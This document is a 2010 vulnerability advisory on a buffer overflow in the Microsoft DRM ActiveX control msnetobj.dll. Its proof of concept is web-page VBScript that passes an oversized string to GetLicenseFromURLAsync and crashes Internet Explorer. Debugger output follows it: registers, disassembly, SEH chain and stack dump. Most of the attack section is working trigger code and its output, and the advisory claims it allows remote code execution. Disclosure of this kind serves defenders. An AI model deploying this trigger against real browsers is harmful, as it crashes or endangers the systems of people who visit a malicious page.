Microsoft DRM Technology Active-X Overflow / Denial Of Service

` ============================================================================================  
  
Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities  
===========================================================================================  
  
by  
  
Asheesh Kumar Mani Tripathi  
  
  
# Vulnerability Discovered By Asheesh kumar Mani Tripathi  
  
# email [email protected]  
  
# company www.aksitservices.co.in  
  
# Credit by Asheesh Anaconda   
  
# Date 18th Sep 2010  
  
# Description: Microsoft DRM technology (msnetobj.dll) ActiveX suffers from multiple remote vulnerabilities  
such as buffer overflow, integer overflow and denial of service (IE crash). This issue is  
triggered when an attacker convinces a victim user to visit a malicious website.  
  
The "GetLicenseFromURLAsync" function does not handle input correctly.   
  
Remote attackers may exploit this issue to execute arbitrary machine code in the context of  
the affected application, facilitating the remote compromise of affected computers. Failed  
exploit attempts likely result in browser crashes.  
  
=============================================Proof Of Concept=============================================  
  
  
  
<object classid='clsid:A9FC132B-096D-460B-B7D5-1DB0FAE0C062' id='RM' />  
<script language='vbscript'>  
  
targetFile = "C:\Windows\System32\msnetobj.dll"  
prototype = "Sub GetLicenseFromURLAsync ( ByVal bstrXMLDoc As String , ByVal bstrURL As String )"  
memberName = "GetLicenseFromURLAsync"  
progid = "MSNETOBJLib.RMGetLicense"  
argCount = 2  
  
arg1="defaultV"  
arg2=String(8212, "A")  
  
RM.GetLicenseFromURLAsync(arg1 ,arg2)   
  
</script>  
=============================================Exception details=============================================  
Exception Code: ACCESS_VIOLATION  
Disasm: 77BEEA7F MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]  
  
Seh Chain:  
--------------------------------------------------  
1 76E7E47D msvcrt.dll  
2 77BB99FA ntdll.dll  
  
  
Called From Returns To   
--------------------------------------------------  
ntdll.77BEEA7F ntdll.77BEE9D9   
ntdll.77BEE9D9 KERNEL32.770E7F75   
KERNEL32.770E7F75 ole32.779EB3E1   
ole32.779EB3E1 ole32.779EB50A   
ole32.779EB50A ole32.779AF6F6   
ole32.779AF6F6 ole32.779AF794   
ole32.779AF794 msnetobj.6B823726   
msnetobj.6B823726 msnetobj.6B823814   
msnetobj.6B823814 msnetobj.6B823C40   
msnetobj.6B823C40 msnetobj.6B823FA7   
msnetobj.6B823FA7 msnetobj.6B824513   
msnetobj.6B824513 msnetobj.6B823A9D   
msnetobj.6B823A9D msvcrt.76E82599   
msvcrt.76E82599 msvcrt.76E826B3   
msvcrt.76E826B3 KERNEL32.770ED0E9   
KERNEL32.770ED0E9 ntdll.77BF19BB   
ntdll.77BF19BB ntdll.77BF198E   
  
  
Registers:  
--------------------------------------------------  
EIP 77BEEA7F  
EAX 00000054  
EBX 00032A78 -> Asc: GsHd(  
ECX 00000000  
EDX 00000004  
EDI 035CEE28 -> 7FFD8000  
ESI 6B821434  
EBP 035CEE48 -> 035CEE90  
ESP 035CEE0C -> 00032A78  
  
  
Block Disassembly:   
--------------------------------------------------  
77BEEA68 PUSH EDI  
77BEEA69 JNZ 77C25E3F  
77BEEA6F TEST BYTE PTR [EBX+10],1  
77BEEA73 JE 77C25E93  
77BEEA79 MOV EAX,[EBX+18]  
77BEEA7C LEA EDI,[EBP-20]  
77BEEA7F MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI] <--- CRASH  
77BEEA80 PUSH 77BEEABD  
77BEEA85 MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]  
77BEEA86 PUSH 1C  
77BEEA88 ADD EAX,EBX  
77BEEA8A PUSH EDX  
77BEEA8B MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]  
77BEEA8C PUSH EAX  
77BEEA8D LEA EAX,[EBP-20]  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 00032A78 -> Asc: GsHd(  
EBP+12 6B821434  
EBP+16 035CEEB0 -> 00000040  
EBP+20 00000000  
EBP+24 77AC1424 -> 779EBEC8  
EBP+28 6B821434  
  
  
Stack Dump:  
--------------------------------------------------  
35CEE0C 78 2A 03 00 08 00 15 C0 00 00 00 00 B0 EE 5C 03 [..............\.]  
35CEE1C 04 00 00 00 34 14 82 6B 00 90 FD 7F 00 80 FD 7F [.......k........]  
35CEE2C 44 EE 5C 03 01 6C BF 77 68 EE 5C 03 84 EE 5C 03 [D.\..l.wh.\...\.]  
35CEE3C 88 EE 5C 03 80 EE 5C 03 92 59 7C 75 90 EE 5C 03 [..\...\..Y.u..\.]  
35CEE4C D9 E9 BE 77 78 2A 03 00 34 14 82 6B B0 EE 5C 03 [...w.......k..\.]  
  
  
  
ApiLog  
--------------------------------------------------  
  
***** Installing Hooks *****  
7735d5c0 RegCreateKeyExA (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,(null))  
Debug String Log  
--------------------------------------------------  
`